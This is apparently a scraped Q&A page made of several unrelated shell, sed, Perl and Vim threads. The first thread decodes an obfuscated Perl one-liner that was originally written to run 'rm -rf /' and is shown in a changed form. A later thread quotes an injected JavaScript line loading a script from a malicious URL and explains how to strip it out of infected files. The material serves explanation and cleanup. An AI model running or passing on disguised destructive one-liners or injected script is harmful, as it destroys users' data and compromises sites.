Perl specific code - perl

The following program is in Perl.
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-#[-`{-};`-{/" -;;s;;$_;see'
Can somebody help me to understand how it works?

This bit of code's already been asked about on the Debian forums.
According to Lacek, the moderator on that thread, what the code originally did is rm -rf /, though they mention they've changed the version there so that people trying to figure out how it works don't delete their entire filesystem. There's also an explanation there of what the various parts of the Perl code do.
(Did you post this knowing what it did, or were you unaware of it?)
To quote Lacek's post on it:
Anyway, here is how the script works.
It is basically two regex substitutions and one transliteration.
Piping anything into its standard input makes no difference, the perl
code doesn't use its input in any way. If you split the long line on
the boundaries of the expressions, you get this:
$??s:;s:s;;$?::
s;;=]=>%-{\\>%<-{;;
y; -/:-#[-`{-};`-{/" -;;
s;;$_;see
The first line is a condition which does nothing save makes the code
look more difficult. If the previous command originated from the perl
code wasn't successful, it does some substitutions on the standard
input (which the program doesn't use, so effectively it substitutes
the nothing). Since no previous command exists, $? is always 0, so the
first line never gets executed.
The second line substitutes the
standard input (the nothing) for seemingly meaningless garbage.
The third line is a transliteration operator. It defines 4 ranges, in
which the characters gets substituted to the one range and the 4
characters given in the transliteration replacement. I'd prefer not to
write the whole transliteration table here, because it's a bit long.
If you are really interested, just write the characters in the defined
ranges (space to '/', ':' to '#', '[' to '(backtick)', and '{' to '}'), and
write next to them the characters from the replacement range ('(backtick)' to
'{'), and finally, write the remaining characters (/,", space and -)
from the replacement pattern. When you have this table, you can see
what character gets replaced to what.
The last line executes the
resulting command by substituting the nothing with the resulted string
(which is 'xterm'. Originally it was 'system"rm -rf /"', and is held
in $_), evaluates the substitution as an expression and executes it.
(I've substituted 'backtick' for the actual backtick character here so that the code auto-formatting doesn't kick in.)

Related

Print strings alongside math results in s// substitution with the /e modifier

I am trying to write a very simple one liner to find cases of:
foo N
and replace them with
foo N-Y
For example, if I had 3 files and they had the following lines in them:
foo 5
foo 3
foo 9
After the script is run with Y=4, the lines would read:
foo 1
foo -1
foo 5
I stumbled upon an existing thread that suggested using /e to run code in the replace half of the substitute command and was able to effectively subtract Y from all my matches, but I have no idea how to best print "foo" back into the file since when I try to separate foo and the number into two capture groups and print them back in, perl thinks I am trying to multiply them and wants an operator.
Here's where I'm at:
find . -iname "*somematch*" -exec perl -pi -e 's/(Foo *)(\d+)/$1$2-4/e' {} \;
Of course this doesn't work, "Scalar found where operator expected at -e line 1, near "$1$2." I'm at a loss as to how best to proceed without writing something much longer.
Edit: To be more specific, if I have the /e option enabled to be able to perform math in the substitution, is there a simple way to print the string in another capture group in that substitution without it trying to do math to it?
Alternatively, is there a simple way to surgically perform the substitution on only part of the pattern? I tried to combine m// and s/// to achieve the results but ended up getting nowhere.
The replacement part is treated as code under /e so it need be written using legal syntax, like you'd use in a program. Writing $t$v isn't legal syntax ($1$2 in your regex).
One way to concatenate strings is $t . $v. Then you also need parenthesis around the addition, since by precedence rules the strings $1 and $2 are concatenated first, and that alphanumeric string attempted in addition, drawing a warning. So
perl -i -pe's/(Foo *)([0-9]+)/$1.($2-4)/e'
I replaced \d with [0-9] since \d matches all kinds of "digits," from all over Unicode, what doesn't seem to be what you need.
There is another way if the math comes after the rest of the pattern, as it does in your examples
perl -i -pe's/Foo *\K([0-9]+)/$1-4/e'
Here the \K is a form of positive lookbehind which drops all matches previous to that anchor, so they are not consumed. Thus only the [0-9]+ is replaced, as needed.

about use sed Modify the file?

I have a question about using sed to modify file. My file content:
<data-value name="WLS_INSTALL_DIR" value="/home/Oracle/wlserver_10.3">
I want to replace the content of field value="/home/Oracle/wlserver_10.3"
to get this result:
<data-value name="WLS_INSTALL_DIR" value="/u03/Middle_home/Oracle/wlserver_10.3">
I use sed:
sed "6 i/^value=/>/s/value= />\(.*\)/value=\"\/u03\/Oracle/Middleware/wlserver_10.3"\" \/\ /u03/silent.xml
Your sed script has a number of issues.
First off, anything that looks like 6istuff will simply write everything after i ("insert") verbatim as a new line before the sixth line. (Some dialects require a newline after the i and will basically do nothing.)
Secondly, ^value= does not match your input; it would only select a line starting with the string value= (the ^ metacharacter means beginning of line).
Thirdly, the /> in your subsitution regex terminates the substitution and so everything from > onwards is parsed as invalid flags for the substitution. I cannot see the purpose of this part, anyway; it doesn't match your data, and so the regex fails.
What remains after removing all these superfluous and erroneous details is a more or less useful sed script. (I assume the 6 to address only the sixth line of input is intentional, although you don't mention this in the question at all.) I have made some additional minor improvements, such as using % as the substitution delimiter and tightening the regex so that it only ever substitutes a double-quoted value.
sed '6s%value="[^"]*"%value="/u03/Oracle/Middleware/wlserver_10.3"%' /u03/silent.xml
Better than 6 would perhaps be to identify the line with /name="WLS_INSTALL_DIR"/.
Still, as alluded to in a comment, the proper way to manipulate XML is with a dedicated tool such as xsltproc.
Try:
sed 's|/home|/u03/Middle_home|'

How to delete multiple lines from text file, including matched line?

I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js
You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashed and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline
character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be
treated literally. For example, in the context address \xabc\xdefx, the RE
delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.

Make sed not buffer by lines

I'm not trying to prevent sed from block-buffering! I am looking to get it to not even line-buffer.
I am not sure if this is even possible at all.
Basically there is a big difference between the behavior of sed and that of cat when interacting with them from a raw pseudo-terminal: cat will immediately spit back the inserted characters when it receives them over STDIN, while sed even in raw mode will not.
A thought experiment could be carried out: given a simple sed command such as s/abc/zzz/g, sending a stream of input to sed like 123ab means that sed at best can provide over standard output the characters 123, because it does not yet know if a c will arrive and cause the result string to be 123zzz, while any other character would have it print exactly what came in (allowing it to "catch up", if you will). So in a way it's obvious why cat does respond immediately; it can afford to.
So of course that's how it would work in an ideal world where sed's authors actually cared about this kind of a use case.
I suspect that that is not the case. In reality, through my not too terribly exhaustive methods, I see that sed will line buffer no matter what (which allows it to always be able to figure out whether to print the 3 z's or not), unless you tell it that you care about matching your regexes past/over newlines, in which case it will just buffer the whole damn thing before providing any output.
My ideal solution is to find a sed that will spit out all the text that it has already finished parsing, without waiting till the end of line to do so. In my little example above, it would instantly spit back the characters 1, 2, and 3, and while a and b are being entered (typed), it says nothing, till either a c is seen (prints zzz), or any other character X is seen, in which case abX is printed, or in the case of EOF ab is printed.
Am I SOL? Should I just incrementally implement my Perl code with the features I want, or is there still some chance that this sort of magically delicious functionality can be got through some kind of configuration?
See another question of mine for more details on why I want this.
So, one potential workaround on this is to manually establish groups of input to "split" across calls to sed (or in my case since i'm already dealing with a Perl script, perl's regex replacement operators) so that I can sort of manually do the flushing. But this cannot achieve the same level of responsiveness because it would require me to think through the expression to describe the points at which the "buffering" is to occur, rather than having a regex parser automatically do it.
There is a tool that matches an input stream against multiple regular expressions in parallel and acts as soon as it decides on a match. It's not sed. It's lex. Or the GNU version, flex.
To make this demonstration work, I had to define a YY_INPUT macro, because flex was line-buffering input by default. Even with no buffering at the stdio level, and even in "interactive" mode, there is an assumption that you don't want to process less than a line at a time.
So this is probably not portable to other versions of lex.
%{
#include <stdio.h>
#define YY_INPUT(buf,result,max_size) \
{ \
int c = getchar(); \
result = (c == EOF) ? YY_NULL : (buf[0] = c, 1); \
}
%}
%%
abc fputs("zzz", stdout); fflush(stdout);
. fputs(yytext, stdout); fflush(stdout);
%%
int main(void)
{
setbuf(stdin, 0);
yylex();
}
Usage: put that program into a file called abczzz.l and run
flex --always-interactive -o abczzz.c abczzz.l
cc abczzz.c -ll -o abczzz
for ch in a b c 1 2 3 ; do echo -n $ch ; sleep 1 ; done | ./abczzz ; echo
You can actually write entire programs in sed.
Here is a way to slurp the whole file into the editing buffer. I added the -n to suppress printing and the $p so it would only print the buffer at the end, after i switch the hold space I have been building up with the current buffer I am editing.
sed -n 'H;$x;$p' FILENAME
You can conditionally build up the hold space based on patterns you encounter:
'/pattern/{H}'
You can conditionally print the buffer as well
'/pattern/{p}'
You can even nest these conditional blocks, if you feel saucy.
You could use a combination of `g' (to copy the hold space to the pattern space, thereby overwriting it) and then s/(.).*/\1/ and such to get at individual characters.
I hope this was at least informative. I would advise you to write a tool in a different language.

How to reformat a source file to go from 2 space indentations to 3?

This question is nearly identical to this question except that I have to go to three spaces (company coding guidelines) rather than four and the accepted solution will only double the matched pattern. Here was my first attempt:
:%s/^\(\s\s\)\+/\1 /gc
But this does not work because four spaces get replaced by three. So I think that what I need is some way to get the count of how many times the pattern matched "+" and use that number to create the other side of the substitution but I feel this functionality is probably not available in Vim's regex (Let me know if you think it might be possible).
I also tried doing the substitution manually by replacing the largest indents first and then the next smaller indent until I got it all converted but this was hard to keep track of the spaces:
:%s/^ \(\S\)/ \1/gc
I could send it through Perl as it seems like Perl might have the ability to do it with its Extended Patterns. But I could not get it to work with my version of Perl. Here was my attempt with trying to count a's:
:%!perl -pe 'm<(?{ $cnt = 0 })(a(?{ local $cnt = $cnt + 1; }))*aaaa(?{ $res = $cnt })>x; print $res'
My last resort will be to write a Perl script to do the conversion but I was hoping for a more general solution in Vim so that I could reuse the idea to solve other issues in the future.
Let vim do it for you?
:set sw=3<CR>
gg=G
The first command sets the shiftwidth option, which is how much you indent by. The second line says: go to the top of the file (gg), and reindent (=) until the end of the file (G).
Of course, this depends on vim having a good formatter for the language you're using. Something might get messed up if not.
Regexp way... Safer, but less understandable:
:%s#^\(\s\s\)\+#\=repeat(' ',strlen(submatch(0))*3/2)#g
(I had to do some experimentation.)
Two points:
If the replacement starts with \=, it is evaluated as an expression.
You can use many things instead of /, so / is available for division.
The perl version you asked for...
From the command line (edits in-place, no backup):
bash$ perl -pi -e 's{^((?: )+)}{" " x (length($1)/2)}e' YOUR_FILE
(in-place, original backed up to "YOUR_FILE.bak"):
bash$ perl -pi.bak -e 's{^((?: )+)}{" " x (length($1)/2)}e' YOUR_FILE
From vim while editing YOUR_FILE:
:%!perl -pe 's{^((?: )+)}{" " x (length($1)/2)}e'
The regex matches the beginning of the line, followed by (the captured set of) one or more "two space" groups. The substitution pattern is a perl expression (hence the 'e' modifier) which counts the number of "two space" groups that were captured and creates a string of that same number of "three space" groups. If an "extra" space was present in the original it is preserved after the substitution. So if you had three spaces before, you'll have four after, five before will turn into seven after, etc.